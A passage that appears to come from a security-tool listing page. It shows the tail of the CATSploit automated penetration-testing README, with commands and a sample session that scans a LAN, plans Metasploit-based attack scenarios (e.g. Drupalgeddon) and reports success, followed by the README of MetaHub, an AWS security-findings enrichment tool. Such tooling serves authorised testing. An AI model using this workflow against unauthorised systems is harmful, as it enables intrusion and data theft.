$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ attacker β”‚ 0.0.0.0 β”‚ kali β”‚ kali 2022.4 β”‚ True β”‚
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ β”‚ Linux 3.10 - 4.11 β”‚ False β”‚
β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚ β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
└──────────┴ β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu β”‚ ubuntu 14.04 β”‚ False β”‚
└──────────┴──────────────┴──────────┴──────────────┴─ β”€β”€β”€β”€β”€β”˜

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ β”‚ β”‚ β”‚
└──────────── β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┑━━━━━━━━━━━╇━━━━━━━┩
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8jos4z β”‚ 0.0.0.0 β”‚ 192.168.0.1 0 β”‚ 0.7 β”‚ 72.8 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
└─────────────┴──────── β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”˜

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All informations and codes are provided solely for educational purposes and/or testing your own systems.

Contact

For any inquiry, please contact the email address as follows:

catsploit@nk.MitsubishiElectric.co.jp



Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).

MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account cloudtrail, and impact



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default config and tags are enabled, but you can change this behavior using the option --context (for enabling all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource type supports this API. You can check supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical Cloudtrail events related to the affected resource, such as creating events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.

Possible Statuses Value Description
ο”΄ effectively-public 100% The resource is effectively public from the Internet.
 restricted-public 40% The resource is public, but there is a restriction like a Security Group.
 unrestricted-private 30% The resource is private but unrestricted, like an open security group.
 launch-public 10% These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet.
 restricted 0% The resource is restricted.
ο”΅ unknown - The resource couldn't be checked

Access

Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.

Possible Statuses Value Description
ο”΄ unrestricted 100% The principal is unrestricted, without any condition or restriction.
ο”΄ untrusted-principal 70% The principal is an AWS Account, not part of your trusted accounts.
 unrestricted-principal 40% The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks.
 cross-account-principal 30% The principal is from another AWS account.
 unrestricted-actions 30% The actions are defined using wildcards.
 dangerous-actions 30% Some dangerous actions are defined as part of this policy.
 unrestricted-service 10% The policy allows an AWS service as principal without restriction.
 restricted 0% The policy is restricted.
ο”΅ unknown - The policy couldn't be checked.

Encryption

Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest and in_transit encryption configuration are both enabled.

Possible Statuses Value Description
ο”΄ unencrypted 100% The resource is not fully encrypted.
 encrypted 0% The resource is fully encrypted including any of it's associations.
ο”΅ unknown - The resource encryption couldn't be checked.

Status

Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.

Possible Statuses Value Description
 attached 100% The resource supports attachment and is attached.
 running 100% The resource supports running and is running.
 enabled 100% The resource supports enabled and is enabled.
 not-attached 0% The resource supports attachment, and it is not attached.
 not-running 0% The resource supports running and it is not running.
 not-enabled 0% The resource supports enabled and it is not enabled.
ο”΅ unknown - The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
 production 100% It is a production resource.
 staging 30% It is a staging resource.
 development 0% It is a development resource.
ο”΅ unknown - The resource couldn't be checked for enviroment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
ο”΅ unknown - The resource couldn't be checked for application.

Findings Soring

As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Created enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to repostiory dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tagging for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.

Run with Security Hub Custom Action

